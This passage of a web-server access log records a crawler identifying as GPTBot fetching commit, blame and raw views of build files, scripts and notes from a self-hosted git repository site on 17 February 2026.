[Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:15:24:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12545] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:15:24:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12544] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:15:24:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12521] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:15:24:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9966] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9975] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:24:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9967] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:24:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9966] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:24:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26860] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:24:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26861] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:24:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 9935] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:15:24:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 10429] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:15:24:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 10431] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:15:24:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 10430] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:15:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=source" [Client 74.7.227.38] [Length 12560] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:15:24:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9976] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:24:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26862] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:24:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9975] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:24:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10291] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:24:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:24:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10289] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:24:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:24:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10290] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:24:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12631] [Gzip 5.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:15:24:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12632] [Gzip 5.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:15:24:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 2668] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:15:24:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 2668] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:15:24:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 2630] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:15:24:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12630] [Gzip 5.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:15:24:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 2668] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:15:24:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/script.js?display=rendered" [Client 74.7.227.38] [Length 10989] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/script.js" +[17/Feb/2026:15:24:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/script.js?display=source" [Client 74.7.227.38] [Length 14920] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/script.js" +[17/Feb/2026:15:24:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%EB%8D%B0%EC%9D%B4%ED%84%B0%EB%B2%A0%EC%9D%B4%EC%8A%A4%20%ED%8A%B8%EB%A6%AC%EA%B1%B0%20%EC%A0%81%EC%9A%A9.md" [Client 74.7.227.38] [Length 15263] [Gzip 6.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%EB%8D%B0%EC%9D%B4%ED%84%B0%EB%B2%A0%EC%9D%B4%EC%8A%A4%20%ED%8A%B8%EB%A6%AC%EA%B1%B0%20%EC%A0%81%EC%9A%A9.md" +[17/Feb/2026:15:24:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%EB%8D%B0%EC%9D%B4%ED%84%B0%EB%B2%A0%EC%9D%B4%EC%8A%A4%20%ED%8A%B8%EB%A6%AC%EA%B1%B0%20%EC%A0%81%EC%9A%A9.md" [Client 74.7.227.38] [Length 10140] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%EB%8D%B0%EC%9D%B4%ED%84%B0%EB%B2%A0%EC%9D%B4%EC%8A%A4%20%ED%8A%B8%EB%A6%AC%EA%B1%B0%20%EC%A0%81%EC%9A%A9.md" +[17/Feb/2026:15:24:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 9929] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/base_library.zip" +[17/Feb/2026:15:24:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 9898] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/base_library.zip" +[17/Feb/2026:15:24:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 9926] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/base_library.zip" +[17/Feb/2026:15:24:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 2813234] [Gzip 25.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/base_library.zip" +[17/Feb/2026:15:24:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/keys.json?display=rendered" [Client 74.7.227.38] [Length 10923] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/keys.json" +[17/Feb/2026:15:24:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/keys.json?display=rendered" [Client 74.7.227.38] [Length 10955] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/keys.json" +[17/Feb/2026:15:24:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/keys.json?display=rendered" [Client 74.7.227.38] [Length 10952] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/keys.json" +[17/Feb/2026:15:24:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=html%2findex.html" [Client 74.7.227.38] [Length 21091] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" +[17/Feb/2026:15:24:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11218] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 